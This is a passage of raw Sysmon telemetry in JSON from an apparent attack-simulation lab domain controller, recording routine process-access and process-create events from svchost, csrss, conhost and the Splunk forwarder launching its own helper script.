C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2228,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2229,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CB-5F25-0000-001080060400}\r\nTargetProcessId: 3812\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CB-5F25-0000-001080060400}","TargetProcessId":"3812","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2230,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.347\r\nProcessGuid: {A837DB8D-01CB-5F25-0000-001064080400}\r\nProcessId: 3872\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.347","ProcessGuid":"{A837DB8D-01CB-5F25-0000-001064080400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2231,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010376B0300}\r\nTargetProcessId: 3872\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010376B0300}","TargetProcessId":"3872","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2232,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010376B0300}\r\nTargetProcessId: 3872\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010376B0300}","TargetProcessId":"3872","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2233,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2234,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2235,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYS